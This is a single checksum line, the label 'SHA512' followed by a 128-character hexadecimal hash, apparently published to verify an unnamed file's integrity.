SHA512 a85146b5d09f8865f95c8f6f3e4ad0bd091d1b2b39d56c1a5fbf823a344daf208f8f59a081af71989efe9b20a0de3d147cb89271a5dc9a34b8b505a8333aa507